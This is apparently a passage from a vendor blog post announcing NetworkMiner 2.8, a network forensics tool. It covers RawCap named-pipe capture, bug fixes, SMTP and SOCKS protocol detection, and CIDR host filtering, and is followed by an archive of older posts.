RawCap.exe -s 10 127.0.0.1 \\.\pipe\RawCap

RawCap will start capturing packets once a PCAP reader connects to the “RawCap” named pipe, which now can be done with NetworkMiner by clicking “Read from Named Pipe” on the File menu.

Read PCAP from Named Pipe

Bug Fixes

NetworkMiner previously produced incorrect JA3S signatures for TLS servers if they sent Session ID values in Server Hello messages or listed only one supported TLS version using the Supported Versions extension. These bugs have now been fixed in NetworkMiner 2.8.

NetworkMiner’s live sniffing feature has been improved to better handle huge packets caused by Large Send Offload (LSO). NetworkMiner previously crashed with an error message saying that the received packet was “larger than the internal message buffer” when attempting to capture a too large packet.

TCP sessions occasionally didn’t show up in NetworkMiner’s Sessions tab previously if the application layer protocol was unknown. This bug has now been fixed in version 2.8.

New Features in NetworkMiner Professional

NetworkMiner Professional includes a feature for port independent protocol detection of protocols like FTP, HTTP, IRC, Meterpreter, SSH and TLS, which enables extraction of artifacts from those protocols even though the service is running on a non-standard port. This new release adds two additional protocols to the collection of identified protocols, namely SMTP and SOCKS. This allows analysts to extract emails from spam runs sent to ports other than 25 or 587, as well as to see what goes on inside covert SOCKS tunnels running on non-standard ports.

SMTP usernames and passwords extracted from SMTP traffic

Image: SMTP credentials extracted from spam run to non-standard SMTP port

In addition to allowing hosts to be filtered using string and regex matching, NetworkMiner Professional also allows the discovered hosts to be filtered on IP address using CIDR notation, such as “192.168.1.0/24” or “10.0.0.0/8”.

NetworkMiner with CIDR filter 192.168.88.0/24

Image: NetworkMiner Professional with CIDR filter 192.168.88.0/24

Here are some IPv4 and IPv6 CIDR filters that you might find useful:

  • 224.0.0.0/4 = IPv4 multicast (224/4 is also supported)
  • 127.0.0.0/8 = IPv4 loopback (127/8 is also supported)
  • fe80::/10 = IPv6 link-local addresses
  • ff00::/8 = IPv6 multicast
  • 0.0.0.0/0 = IPv4 hosts (0/0 is also supported)
  • 0::/0 = IPv6 hosts

Credits

We’d like to thank René Perraux, Matt Smith and Anand Kumar Singh for reporting bugs that have been fixed in this new release.

Upgrading to Version 2.8

Users who have purchased NetworkMiner Professional can download a free update to version 2.8 from our customer portal, or use the “Check for Updates” feature from NetworkMiner's Help menu. Those who instead prefer to use the free and open source version can grab the latest version of NetworkMiner from the official NetworkMiner page.

Posted by Erik Hjelmvik on Monday, 02 January 2023 08:00:00 (UTC/GMT)

Tags: #NetworkMiner#IEC-104#SMTP#SOCKS#PIPI#CIDR

Short URL: https://netresec.com/?b=231d523

2022 December

NetworkMiner in FLARE VM

2022 September

Hunting for C2 Traffic

2022 August

What is PCAP over IP?

2022 April

NetworkMiner 2.7.3 Released

2022 January

PolarProxy in Windows Sandbox

2021 November

Open .ETL Files with NetworkMiner and CapLoader

2021 September

Start Menu Search Video

2021 July

Walkthrough of DFIR Madness PCAP

2021 June

NetworkMiner 2.7 Released

2021 May

Running NetworkMiner in Windows Sandbox

2021 April

Analysing a malware PCAP with IcedID and Cobalt Strike traffic

2020 October

Honeypot Network Forensics

2020 September

NetworkMiner 2.6 Released

2020 March

Discovered Artifacts in Decrypted HTTPS

2020 January

Sharing a PCAP with Decrypted HTTPS

2019 November

The NSA HSTS Security Feature Mystery

NetworkMiner 2.5 Released

2019 January

Video: TrickBot and ETERNALCHAMPION

NetworkMiner 2.4 Released

2018 December

TorPCAP - Tor Network Forensics

2018 August

NetworkMiner 2.3.2 Released!

2018 April

NetworkMiner 2.3 Released!

2018 February

Examining Malware Redirects with NetworkMiner Professional

Analyzing Kelihos SPAM in CapLoader and NetworkMiner

Antivirus Scanning of a PCAP File

Examining an x509 Covert Channel

Zyklon Malware Network Forensics Video Tutorial

2017 September

Hunting AdwindRAT with SSL Heuristics

2017 August

NetworkMiner 2.2 Released

2017 March

Enable file extraction from PCAP with NetworkMiner in six steps

2017 February

10 Years of NetworkMiner

2017 January

Network Forensics Training at TROOPERS 2017

NetworkMiner 2.1 Released

2016 September

Bug Bounty PCAP T-shirts

2016 March

Packet Injection Attacks in the Wild

2016 February

Analyzing Web Browsing Activity

NetworkMiner 2.0 Released

2015 December

Network Forensics Training at TROOPERS

2015 October

Port Independent Protocol Detection

X / twitter

NETRESEC on X / Twitter: @netresec

Mastodon

NETRESEC on Mastodon: @netresec@infosec.exchange